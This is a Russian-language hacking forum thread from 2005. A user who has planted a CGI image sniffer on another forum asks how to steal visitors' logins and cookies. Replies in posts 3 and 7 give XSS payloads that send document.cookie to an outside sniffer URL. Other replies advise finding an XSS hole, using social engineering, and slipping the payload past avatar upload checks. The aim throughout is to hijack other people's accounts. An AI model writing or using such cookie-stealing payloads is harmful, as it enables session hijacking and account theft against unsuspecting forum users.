HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Как использовать cgi-снифферы?
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Как использовать cgi-снифферы?
  #1  
Старый 05.12.2005, 16:29
ZetRoX
Познающий
Регистрация: 04.12.2005
Сообщений: 52
С нами: 10753681

Репутация: 1
По умолчанию Как использовать cgi-снифферы?
Привет всем, кто здесь присутствует.

Прошу совет, что делать дельше...
Я поставил сниффер с http://www.s.netsec.ru/ на один форум....кто-то нажал на мою фотку и у меня повились строки с IP адресом, ссылкой из какого топа пришли и время....а что надо дальше сделать, чтобы узнать логин и пароль этого счастливчика???
или cookie....

жду ответа, заранее благодарен.
____________________________
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 05.12.2005, 16:35
dinar_007
Флудер
Регистрация: 18.01.2005
Сообщений: 2,298
С нами: 11215046

Репутация: 1844


По умолчанию
А для этого нужен какой-нибудь скрипт, который ворует куки или тег )))
 
Ответить с цитированием

  #3  
Старый 05.12.2005, 16:40
bul666
Banned
Регистрация: 21.04.2005
Сообщений: 328
С нами: 11081186

Репутация: 9
По умолчанию
например если сниффер JPG, то <script>var img=new IMG(); img.src="sniffer/s.jpg"+document.cookie;</script> Или ченит типа этого ))
 
Ответить с цитированием

  #4  
Старый 05.12.2005, 17:41
qBiN
Постоянный
Регистрация: 20.01.2005
Сообщений: 899
С нами: 11212166

Репутация: 182


По умолчанию
найди xss уязвимость если пассивная то можно с помощью СИ(фреймы,или прямую ссылку это зависит от твоего воображения и опыта в СИ) если активная,то там на порядок проще.
Код который нужно вставлять тебе уже привели,другие примеры скрипта ворующего куки можно поглядеть на antichat.ru
 
Ответить с цитированием

  #5  
Старый 05.12.2005, 21:16
qBiN
Постоянный
Регистрация: 20.01.2005
Сообщений: 899
С нами: 11212166

Репутация: 182


По умолчанию
Давайте из темы не будем делать флейм,все что не по теме (а у нас она про cgi снифферы) щас сотру.
 
Ответить с цитированием

  #6  
Старый 30.12.2005, 16:43
ZetRoX
Познающий
Регистрация: 04.12.2005
Сообщений: 52
С нами: 10753681

Репутация: 1
По умолчанию
Прошу прощения, напишите мне плиз скрипт, чтобы его можно было во Flash вставить...
ну короче говоря...есть Flash сайт....мне надо сделать так, чтобы при кликанье ссылки на мой сниф приходили куки...вот и всё....в ссылку могу вписать Java Script, FS Command, Action Script ну или ссылку на страницу....прошу напишите для чего-нить из этого скрипт....

мой снифф http://s.netsec.ru/ZetRoX/pic.gif
 
Ответить с цитированием

  #7  
Старый 31.12.2005, 16:46
CTTAPTAK
Познающий
Регистрация: 09.10.2005
Сообщений: 44
С нами: 10834342

Репутация: 5
По умолчанию
обычно юзается скрипт <script>img=new Image(); img.src="http://s.netsec.ru/ZetRoX/pic.gif?;"+document.cookie;</script>

у меня встречный вопрос:
Как указать в скрипте размер картинки? (чтоб форум не противился принятию как аватар) требуется размер 100*100
 
Ответить с цитированием

  #8  
Старый 31.12.2005, 17:01
ZetRoX
Познающий
Регистрация: 04.12.2005
Сообщений: 52
С нами: 10753681

Репутация: 1
По умолчанию
я знаю, что этот скрипт, но он нефига не работает даже на самом себе проверял....
 
Ответить с цитированием

  #9  
Старый 31.12.2005, 17:18
CTTAPTAK
Познающий
Регистрация: 09.10.2005
Сообщений: 44
С нами: 10834342

Репутация: 5
По умолчанию
он работает но чтоб он работал на всяких форумах/порталах надо каким то образом сделать чтоб аплоадеры распоновали как ЖэПэГэшку с размерами 100*100
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Кто пробовал использовать уязвимости беспроводных сетей? $h@dow Болталка 4 24.09.2005 04:30
как использовать ворованный кукис??? Rolik Уязвимости Mail-сервис 10 21.05.2005 00:47



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка

Загрузка чата...
×

ESCROW ADMIN PANEL

Загрузка...
Загрузка...